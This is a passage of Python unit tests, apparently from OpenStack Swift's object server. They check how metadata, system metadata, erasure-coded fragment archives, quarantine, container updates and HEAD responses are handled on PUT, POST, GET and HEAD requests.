        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
                 'X-Object-Meta-1': 'One',
                 'X-Object-Meta-Two': 'Two'})
    req.body = 'VERIFY THREE'
    def mock_get_and_setxattr(*args, **kargs):
        # simulate a filesystem without xattr support
        # (ENOTSUP is not defined on all platforms; fall back to EOPNOTSUPP)
        error_num = errno.ENOTSUP if hasattr(errno, 'ENOTSUP') else \
            errno.EOPNOTSUPP
        raise IOError(error_num, 'Operation not supported')
    with mock.patch('xattr.getxattr', mock_get_and_setxattr):
        with mock.patch('xattr.setxattr', mock_get_and_setxattr):
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 507)
def test_PUT_client_timeout(self):
    """A ChunkReadTimeout while reading the request body maps to
    408 Request Timeout."""
    class FakeTimeout(BaseException):
        # raising from __enter__ makes the timeout fire as soon as the
        # server enters its read-timeout context
        def __enter__(self):
            raise self
        def __exit__(self, typ, value, tb):
            pass
    # This is just so the test fails when run on older object server code
    # instead of exploding.
    if not hasattr(object_server, 'ChunkReadTimeout'):
        object_server.ChunkReadTimeout = None
    with mock.patch.object(object_server, 'ChunkReadTimeout', FakeTimeout):
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Content-Length': '6'})
        req.environ['wsgi.input'] = WsgiBytesIO(b'VERIFY')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 408)
def test_PUT_system_metadata(self):
    # check that sysmeta is stored in diskfile
    """X-Object-Sysmeta-* and X-Object-Transient-Sysmeta-* headers on a
    PUT are persisted in the .data file metadata."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                 'X-Object-Meta-1': 'One',
                 'X-Object-Sysmeta-1': 'One',
                 'X-Object-Sysmeta-Two': 'Two',
                 'X-Object-Transient-Sysmeta-Foo': 'Bar'})
    req.body = 'VERIFY SYSMETA'
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    objfile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                          hash_path('a', 'c', 'o')),
        timestamp + '.data')
    self.assertTrue(os.path.isfile(objfile))
    self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
    # all meta/sysmeta/transient-sysmeta values must be in the diskfile
    self.assertEqual(diskfile.read_metadata(objfile),
                     {'X-Timestamp': timestamp,
                      'Content-Length': '14',
                      'Content-Type': 'text/plain',
                      'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                      'name': '/a/c/o',
                      'X-Object-Meta-1': 'One',
                      'X-Object-Sysmeta-1': 'One',
                      'X-Object-Sysmeta-Two': 'Two',
                      'X-Object-Transient-Sysmeta-Foo': 'Bar'})
def test_PUT_succeeds_with_later_POST(self):
    """A PUT whose timestamp is older than an existing .meta (from a
    later POST) still succeeds; both the new .data and the newer .meta
    remain on disk."""
    t_put = next(self.ts).internal
    req = Request.blank('/sda1/p/a/c/o',
                        environ={'REQUEST_METHOD': 'PUT'},
                        headers={'X-Timestamp': t_put,
                                 'Content-Length': 0,
                                 'Content-Type': 'plain/text'})
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    # note: t_put2 < t_post, so the second PUT lands "before" the POST
    t_put2 = next(self.ts).internal
    t_post = next(self.ts).internal
    req = Request.blank('/sda1/p/a/c/o',
                        environ={'REQUEST_METHOD': 'POST'},
                        headers={'X-Timestamp': t_post})
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 202)
    req = Request.blank('/sda1/p/a/c/o',
                        environ={'REQUEST_METHOD': 'PUT'},
                        headers={'X-Timestamp': t_put2,
                                 'Content-Length': 0,
                                 'Content-Type': 'plain/text'},
                        )
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    obj_dir = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(0), 'p',
                          hash_path('a', 'c', 'o')))
    # both the second PUT's .data and the POST's .meta should survive
    ts_file = os.path.join(obj_dir, t_put2 + '.data')
    self.assertTrue(os.path.isfile(ts_file))
    meta_file = os.path.join(obj_dir, t_post + '.meta')
    self.assertTrue(os.path.isfile(meta_file))
def test_POST_system_metadata(self):
    # check that diskfile sysmeta is not changed by a POST
    """POST may update user meta but must not touch X-Object-Sysmeta-*;
    the .meta file only carries the user meta."""
    timestamp1 = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp1,
                 'Content-Type': 'text/plain',
                 'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                 'X-Object-Meta-1': 'One',
                 'X-Object-Sysmeta-1': 'One',
                 'X-Object-Sysmeta-Two': 'Two'})
    req.body = 'VERIFY SYSMETA'
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    # POST tries to change both user meta and sysmeta
    timestamp2 = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
        headers={'X-Timestamp': timestamp2,
                 'X-Object-Meta-1': 'Not One',
                 'X-Object-Sysmeta-1': 'Not One',
                 'X-Object-Sysmeta-Two': 'Not Two'})
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 202)
    # original .data file metadata should be unchanged
    objfile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                          hash_path('a', 'c', 'o')),
        timestamp1 + '.data')
    self.assertTrue(os.path.isfile(objfile))
    self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
    self.assertEqual(diskfile.read_metadata(objfile),
                     {'X-Timestamp': timestamp1,
                      'Content-Length': '14',
                      'Content-Type': 'text/plain',
                      'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                      'name': '/a/c/o',
                      'X-Object-Meta-1': 'One',
                      'X-Object-Sysmeta-1': 'One',
                      'X-Object-Sysmeta-Two': 'Two'})
    # .meta file metadata should have only user meta items
    metafile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                          hash_path('a', 'c', 'o')),
        timestamp2 + '.meta')
    self.assertTrue(os.path.isfile(metafile))
    self.assertEqual(diskfile.read_metadata(metafile),
                     {'X-Timestamp': timestamp2,
                      'name': '/a/c/o',
                      'X-Object-Meta-1': 'Not One'})
def test_POST_then_fetch_content_type(self):
    # check that content_type is updated by a POST
    """A POST can change Content-Type: the .data file is untouched, the
    .meta file records the new type with a Content-Type-Timestamp, and
    GET/HEAD serve the updated type."""
    timestamp1 = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp1,
                 'Content-Type': 'text/plain',
                 'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                 'X-Object-Meta-1': 'One'})
    req.body = 'VERIFY SYSMETA'
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    timestamp2 = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
        headers={'X-Timestamp': timestamp2,
                 'X-Object-Meta-1': 'Not One',
                 'Content-Type': 'text/html'})
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 202)
    # original .data file metadata should be unchanged
    objfile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(0), 'p',
                          hash_path('a', 'c', 'o')),
        timestamp1 + '.data')
    self.assertTrue(os.path.isfile(objfile))
    self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
    self.assertEqual(diskfile.read_metadata(objfile),
                     {'X-Timestamp': timestamp1,
                      'Content-Length': '14',
                      'Content-Type': 'text/plain',
                      'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                      'name': '/a/c/o',
                      'X-Object-Meta-1': 'One'})
    # .meta file metadata should have updated content-type
    # (filename encodes both the meta and content-type timestamps)
    metafile_name = encode_timestamps(Timestamp(timestamp2),
                                      Timestamp(timestamp2),
                                      explicit=True)
    metafile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(0), 'p',
                          hash_path('a', 'c', 'o')),
        metafile_name + '.meta')
    self.assertTrue(os.path.isfile(metafile))
    self.assertEqual(diskfile.read_metadata(metafile),
                     {'X-Timestamp': timestamp2,
                      'name': '/a/c/o',
                      'Content-Type': 'text/html',
                      'Content-Type-Timestamp': timestamp2,
                      'X-Object-Meta-1': 'Not One'})
    def check_response(resp):
        # GET/HEAD must serve the POSTed content-type and meta, but keep
        # the original PUT's etag; last-modified follows the POST time
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.content_length, 14)
        self.assertEqual(resp.content_type, 'text/html')
        self.assertEqual(resp.headers['content-type'], 'text/html')
        self.assertEqual(
            resp.headers['last-modified'],
            strftime('%a, %d %b %Y %H:%M:%S GMT',
                     gmtime(math.ceil(float(timestamp2)))))
        self.assertEqual(resp.headers['etag'],
                         '"1000d172764c9dbc3a5798a67ec5bb76"')
        self.assertEqual(resp.headers['x-object-meta-1'], 'Not One')
    req = Request.blank('/sda1/p/a/c/o',
                        environ={'REQUEST_METHOD': 'HEAD'})
    resp = req.get_response(self.object_controller)
    check_response(resp)
    req = Request.blank('/sda1/p/a/c/o',
                        environ={'REQUEST_METHOD': 'GET'})
    resp = req.get_response(self.object_controller)
    check_response(resp)
def test_POST_transient_sysmeta(self):
    # check that diskfile transient system meta is changed by a POST
    """Unlike X-Object-Sysmeta-*, X-Object-Transient-Sysmeta-* IS
    updatable by POST and lands in the .meta file."""
    timestamp1 = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp1,
                 'Content-Type': 'text/plain',
                 'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                 'X-Object-Meta-1': 'One',
                 'X-Object-Sysmeta-1': 'One',
                 'X-Object-Transient-Sysmeta-Foo': 'Bar'})
    req.body = 'VERIFY SYSMETA'
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    timestamp2 = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
        headers={'X-Timestamp': timestamp2,
                 'X-Object-Meta-1': 'Not One',
                 'X-Object-Sysmeta-1': 'Not One',
                 'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 202)
    # original .data file metadata should be unchanged
    objfile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(0), 'p',
                          hash_path('a', 'c', 'o')),
        timestamp1 + '.data')
    self.assertTrue(os.path.isfile(objfile))
    self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
    self.assertDictEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': timestamp1,
                          'Content-Length': '14',
                          'Content-Type': 'text/plain',
                          'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                          'name': '/a/c/o',
                          'X-Object-Meta-1': 'One',
                          'X-Object-Sysmeta-1': 'One',
                          'X-Object-Transient-Sysmeta-Foo': 'Bar'})
    # .meta file metadata should have only user meta items
    # (plus the updated transient sysmeta; persistent sysmeta stays out)
    metafile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(0), 'p',
                          hash_path('a', 'c', 'o')),
        timestamp2 + '.meta')
    self.assertTrue(os.path.isfile(metafile))
    self.assertDictEqual(diskfile.read_metadata(metafile),
                         {'X-Timestamp': timestamp2,
                          'name': '/a/c/o',
                          'X-Object-Meta-1': 'Not One',
                          'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
def test_PUT_then_fetch_system_metadata(self):
    """Meta, sysmeta and transient-sysmeta set at PUT time are all
    returned by subsequent GET and HEAD responses."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                 'X-Object-Meta-1': 'One',
                 'X-Object-Sysmeta-1': 'One',
                 'X-Object-Sysmeta-Two': 'Two',
                 'X-Object-Transient-Sysmeta-Foo': 'Bar'})
    req.body = 'VERIFY SYSMETA'
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    def check_response(resp):
        # shared assertions for both GET and HEAD responses
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.content_length, 14)
        self.assertEqual(resp.content_type, 'text/plain')
        self.assertEqual(resp.headers['content-type'], 'text/plain')
        self.assertEqual(
            resp.headers['last-modified'],
            strftime('%a, %d %b %Y %H:%M:%S GMT',
                     gmtime(math.ceil(float(timestamp)))))
        self.assertEqual(resp.headers['etag'],
                         '"1000d172764c9dbc3a5798a67ec5bb76"')
        self.assertEqual(resp.headers['x-object-meta-1'], 'One')
        self.assertEqual(resp.headers['x-object-sysmeta-1'], 'One')
        self.assertEqual(resp.headers['x-object-sysmeta-two'], 'Two')
        self.assertEqual(resp.headers['x-object-transient-sysmeta-foo'],
                         'Bar')
    req = Request.blank('/sda1/p/a/c/o',
                        environ={'REQUEST_METHOD': 'HEAD'})
    resp = req.get_response(self.object_controller)
    check_response(resp)
    req = Request.blank('/sda1/p/a/c/o',
                        environ={'REQUEST_METHOD': 'GET'})
    resp = req.get_response(self.object_controller)
    check_response(resp)
def test_PUT_then_POST_then_fetch_system_metadata(self):
    """After a POST, GET/HEAD serve updated user meta and transient
    sysmeta, while persistent sysmeta keeps the PUT-time values; user
    meta and transient sysmeta absent from the POST are dropped."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                 'X-Object-Meta-0': 'deleted by post',
                 'X-Object-Sysmeta-0': 'Zero',
                 'X-Object-Transient-Sysmeta-0': 'deleted by post',
                 'X-Object-Meta-1': 'One',
                 'X-Object-Sysmeta-1': 'One',
                 'X-Object-Sysmeta-Two': 'Two',
                 'X-Object-Transient-Sysmeta-Foo': 'Bar'})
    req.body = 'VERIFY SYSMETA'
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    timestamp2 = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
        headers={'X-Timestamp': timestamp2,
                 'X-Object-Meta-1': 'Not One',
                 'X-Object-Sysmeta-1': 'Not One',
                 'X-Object-Sysmeta-Two': 'Not Two',
                 'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 202)
    def check_response(resp):
        # user meta should be updated but not sysmeta
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.content_length, 14)
        self.assertEqual(resp.content_type, 'text/plain')
        self.assertEqual(resp.headers['content-type'], 'text/plain')
        self.assertEqual(
            resp.headers['last-modified'],
            strftime('%a, %d %b %Y %H:%M:%S GMT',
                     gmtime(math.ceil(float(timestamp2)))))
        self.assertEqual(resp.headers['etag'],
                         '"1000d172764c9dbc3a5798a67ec5bb76"')
        self.assertEqual(resp.headers['x-object-meta-1'], 'Not One')
        self.assertEqual(resp.headers['x-object-sysmeta-0'], 'Zero')
        self.assertEqual(resp.headers['x-object-sysmeta-1'], 'One')
        self.assertEqual(resp.headers['x-object-sysmeta-two'], 'Two')
        self.assertEqual(resp.headers['x-object-transient-sysmeta-foo'],
                         'Not Bar')
        # meta/transient-sysmeta not re-sent in the POST are gone
        self.assertNotIn('x-object-meta-0', resp.headers)
        self.assertNotIn('x-object-transient-sysmeta-0', resp.headers)
    req = Request.blank('/sda1/p/a/c/o',
                        environ={'REQUEST_METHOD': 'HEAD'})
    resp = req.get_response(self.object_controller)
    check_response(resp)
    req = Request.blank('/sda1/p/a/c/o',
                        environ={'REQUEST_METHOD': 'GET'})
    resp = req.get_response(self.object_controller)
    check_response(resp)
def test_PUT_with_replication_headers(self):
    # check that otherwise disallowed headers are accepted when specified
    # by X-Backend-Replication-Headers
    """X-Backend-Replication-Headers whitelists headers (here
    X-Static-Large-Object) that the server's allowed_headers would
    otherwise drop."""
    # first PUT object
    timestamp1 = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp1,
                 'Content-Type': 'text/plain',
                 'Content-Length': '14',
                 'Etag': '1000d172764c9dbc3a5798a67ec5bb76',
                 'Custom-Header': 'custom1',
                 'X-Object-Meta-1': 'meta1',
                 'X-Static-Large-Object': 'False'})
    req.body = 'VERIFY SYSMETA'
    # restrict set of allowed headers on this server
    with mock.patch.object(self.object_controller, 'allowed_headers',
                           ['Custom-Header']):
        resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    objfile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(0), 'p',
                          hash_path('a', 'c', 'o')),
        timestamp1 + '.data')
    # X-Static-Large-Object is disallowed.
    self.assertEqual(diskfile.read_metadata(objfile),
                     {'X-Timestamp': timestamp1,
                      'Content-Type': 'text/plain',
                      'Content-Length': '14',
                      'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                      'name': '/a/c/o',
                      'Custom-Header': 'custom1',
                      'X-Object-Meta-1': 'meta1'})
    # PUT object again with X-Backend-Replication-Headers
    timestamp2 = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp2,
                 'Content-Type': 'text/plain',
                 'Content-Length': '14',
                 'Etag': '1000d172764c9dbc3a5798a67ec5bb76',
                 'Custom-Header': 'custom1',
                 'X-Object-Meta-1': 'meta1',
                 'X-Static-Large-Object': 'False',
                 'X-Backend-Replication-Headers':
                 'X-Static-Large-Object'})
    req.body = 'VERIFY SYSMETA'
    with mock.patch.object(self.object_controller, 'allowed_headers',
                           ['Custom-Header']):
        resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    objfile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(0), 'p',
                          hash_path('a', 'c', 'o')),
        timestamp2 + '.data')
    # X-Static-Large-Object should be copied since it is now allowed by
    # replication headers.
    self.assertEqual(diskfile.read_metadata(objfile),
                     {'X-Timestamp': timestamp2,
                      'Content-Type': 'text/plain',
                      'Content-Length': '14',
                      'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                      'name': '/a/c/o',
                      'Custom-Header': 'custom1',
                      'X-Object-Meta-1': 'meta1',
                      'X-Static-Large-Object': 'False'})
def test_PUT_container_connection(self):
    """A PUT succeeds (201) regardless of the container update outcome:
    success, server error, or an exception from the connection."""
    def mock_http_connect(response, with_exc=False):
        # fake http_connect whose response has the given status and,
        # optionally, raises from getresponse()
        class FakeConn(object):
            def __init__(self, status, with_exc):
                self.status = status
                self.reason = 'Fake'
                self.host = '1.2.3.4'
                self.port = '1234'
                self.with_exc = with_exc
            def getresponse(self):
                if self.with_exc:
                    raise Exception('test')
                return self
            def read(self, amt=None):
                return ''
        return lambda *args, **kwargs: FakeConn(response, with_exc)
    # container update returns 201: object PUT succeeds
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp,
                 'X-Container-Host': '1.2.3.4:0',
                 'X-Container-Partition': '3',
                 'X-Container-Device': 'sda1',
                 'X-Container-Timestamp': '1',
                 'Content-Type': 'application/new1',
                 'Content-Length': '0'})
    with mock.patch.object(
            object_server, 'http_connect', mock_http_connect(201)):
        with fake_spawn():
            resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    # container update returns 500: object PUT still succeeds
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp,
                 'X-Container-Host': '1.2.3.4:0',
                 'X-Container-Partition': '3',
                 'X-Container-Device': 'sda1',
                 'X-Container-Timestamp': '1',
                 'Content-Type': 'application/new1',
                 'Content-Length': '0'})
    with mock.patch.object(
            object_server, 'http_connect', mock_http_connect(500)):
        with fake_spawn():
            resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    # container update raises: object PUT still succeeds
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp,
                 'X-Container-Host': '1.2.3.4:0',
                 'X-Container-Partition': '3',
                 'X-Container-Device': 'sda1',
                 'X-Container-Timestamp': '1',
                 'Content-Type': 'application/new1',
                 'Content-Length': '0'})
    with mock.patch.object(
            object_server, 'http_connect',
            mock_http_connect(500, with_exc=True)):
        with fake_spawn():
            resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
def test_EC_GET_PUT_data(self):
    """For each EC policy, a frag archive PUT with an Ec-Frag-Index can
    be read back byte-for-byte via GET."""
    for policy in self.ec_policies:
        raw_data = ('VERIFY' * policy.ec_segment_size)[:-432]
        frag_archives = encode_frag_archive_bodies(policy, raw_data)
        # pick an arbitrary fragment to store
        frag_index = random.randint(0, len(frag_archives) - 1)
        # put EC frag archive
        req = Request.blank('/sda1/p/a/c/o', method='PUT', headers={
            'X-Timestamp': next(self.ts).internal,
            'Content-Type': 'application/verify',
            'Content-Length': len(frag_archives[frag_index]),
            'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
            'X-Backend-Storage-Policy-Index': int(policy),
        })
        req.body = frag_archives[frag_index]
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # get EC frag archive
        req = Request.blank('/sda1/p/a/c/o', headers={
            'X-Backend-Storage-Policy-Index': int(policy),
        })
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.body, frag_archives[frag_index])
def test_EC_GET_quarantine_invalid_frag_archive(self):
    """Reading a corrupt EC frag archive raises DiskFileQuarantined when
    the body is consumed, and the object is quarantined (later 404)."""
    policy = random.choice(self.ec_policies)
    raw_data = ('VERIFY' * policy.ec_segment_size)[:-432]
    frag_archives = encode_frag_archive_bodies(policy, raw_data)
    frag_index = random.randint(0, len(frag_archives) - 1)
    content_length = len(frag_archives[frag_index])
    # put EC frag archive
    req = Request.blank('/sda1/p/a/c/o', method='PUT', headers={
        'X-Timestamp': next(self.ts).internal,
        'Content-Type': 'application/verify',
        'Content-Length': content_length,
        'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
        'X-Backend-Storage-Policy-Index': int(policy),
    })
    # prepend garbage but keep the declared length, corrupting the frag
    corrupt = 'garbage' + frag_archives[frag_index]
    req.body = corrupt[:content_length]
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    # get EC frag archive
    req = Request.blank('/sda1/p/a/c/o', headers={
        'X-Backend-Storage-Policy-Index': int(policy),
    })
    resp = req.get_response(self.object_controller)
    # headers are fine; corruption is only detected while streaming
    self.assertEqual(resp.status_int, 200)
    with self.assertRaises(DiskFileQuarantined) as ctx:
        resp.body
    self.assertIn("Invalid EC metadata", str(ctx.exception))
    # nothing is logged on *our* loggers
    errors = self.object_controller.logger.get_lines_for_level('error')
    self.assertEqual(errors, [])
    # get EC frag archive - it's gone
    req = Request.blank('/sda1/p/a/c/o', headers={
        'X-Backend-Storage-Policy-Index': int(policy),
    })
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 404)
def test_PUT_ssync_multi_frag(self):
    """For EC policies, X-Backend-Ssync-Frag-Index lets a primary node
    store multiple frag indexes at the same timestamp; without it, a
    same-timestamp PUT with a different frag index conflicts (409)."""
    timestamp = utils.Timestamp(time()).internal
    def put_with_index(expected_rsp, frag_index, node_index=None):
        # PUT with the given ec-frag-index (and optional ssync node
        # index) and assert the expected status; on success also assert
        # the expected #frag#d.data file exists
        data_file_tail = '#%d#d.data' % frag_index
        headers = {'X-Timestamp': timestamp,
                   'Content-Length': '6',
                   'Content-Type': 'application/octet-stream',
                   'X-Backend-Ssync-Frag-Index': node_index,
                   'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
                   'X-Backend-Storage-Policy-Index': int(policy)}
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers=headers)
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(
            resp.status_int, expected_rsp,
            'got %s != %s for frag_index=%s node_index=%s' % (
                resp.status_int, expected_rsp,
                frag_index, node_index))
        if expected_rsp == 409:
            return
        obj_dir = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(int(policy)),
                              'p', hash_path('a', 'c', 'o')))
        data_file = os.path.join(obj_dir, timestamp) + data_file_tail
        self.assertTrue(os.path.isfile(data_file),
                        'Expected file %r not found in %r for policy %r'
                        % (data_file, os.listdir(obj_dir), int(policy)))
    for policy in POLICIES:
        if policy.policy_type == EC_POLICY:
            # upload with a ec-frag-index
            put_with_index(201, 3)
            # same timestamp will conflict a different ec-frag-index
            put_with_index(409, 2)
            # but with the ssync-frag-index (primary node) it will just
            # save both!
            put_with_index(201, 2, 2)
            # but even with the ssync-frag-index we can still get a
            # timestamp collision if the file already exists
            put_with_index(409, 3, 3)
            # FWIW, ssync will never send in-consistent indexes - but if
            # something else did, from the object server perspective ...
            # ... the ssync-frag-index is canonical on the
            # read/pre-existence check
            put_with_index(409, 7, 2)
            # ... but the ec-frag-index is canonical when it comes to on
            # disk file
            put_with_index(201, 7, 6)
    def test_PUT_commits_data(self):
        """PUT must leave a committed data file on disk for every policy.

        For EC policies the commit step renames the file to include the
        frag index and durable marker (#2#d.data here); replication
        policies are expected to leave a plain .data file.
        """
        for policy in POLICIES:
            timestamp = utils.Timestamp(int(time())).internal
            data_file_tail = '.data'
            headers = {'X-Timestamp': timestamp,
                       'Content-Length': '6',
                       'Content-Type': 'application/octet-stream',
                       'X-Backend-Storage-Policy-Index': int(policy)}
            if policy.policy_type == EC_POLICY:
                # commit renames data file
                headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
                data_file_tail = '#2#d.data'
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                headers=headers)
            req.body = 'VERIFY'
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            obj_dir = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(int(policy)),
                                  'p', hash_path('a', 'c', 'o')))
            data_file = os.path.join(obj_dir, timestamp) + data_file_tail
            self.assertTrue(os.path.isfile(data_file),
                            'Expected file %r not found in %r for policy %r'
                            % (data_file, os.listdir(obj_dir), int(policy)))
            # clean up so the next policy's PUT starts from an empty dir
            rmtree(obj_dir)
    def test_HEAD(self):
        # Test swift.obj.server.ObjectController.HEAD
        # container path (no object component) is a bad request
        req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
        # nothing PUT yet -> 404 with no X-Backend-Timestamp
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        self.assertFalse('X-Backend-Timestamp' in resp.headers)
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'application/x-test',
                     'X-Object-Meta-1': 'One',
                     'X-Object-Meta-Two': 'Two'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # HEAD reports length, type, last-modified, etag and user metadata
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.content_length, 6)
        self.assertEqual(resp.content_type, 'application/x-test')
        self.assertEqual(resp.headers['content-type'], 'application/x-test')
        self.assertEqual(
            resp.headers['last-modified'],
            strftime('%a, %d %b %Y %H:%M:%S GMT',
                     gmtime(math.ceil(float(timestamp)))))
        self.assertEqual(resp.headers['etag'],
                         '"0b4c12d7e0a73840c1c4f148fda3b037"')
        self.assertEqual(resp.headers['x-object-meta-1'], 'One')
        self.assertEqual(resp.headers['x-object-meta-two'], 'Two')
        # data file removed behind the server's back -> 404
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.data')
        os.unlink(objfile)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
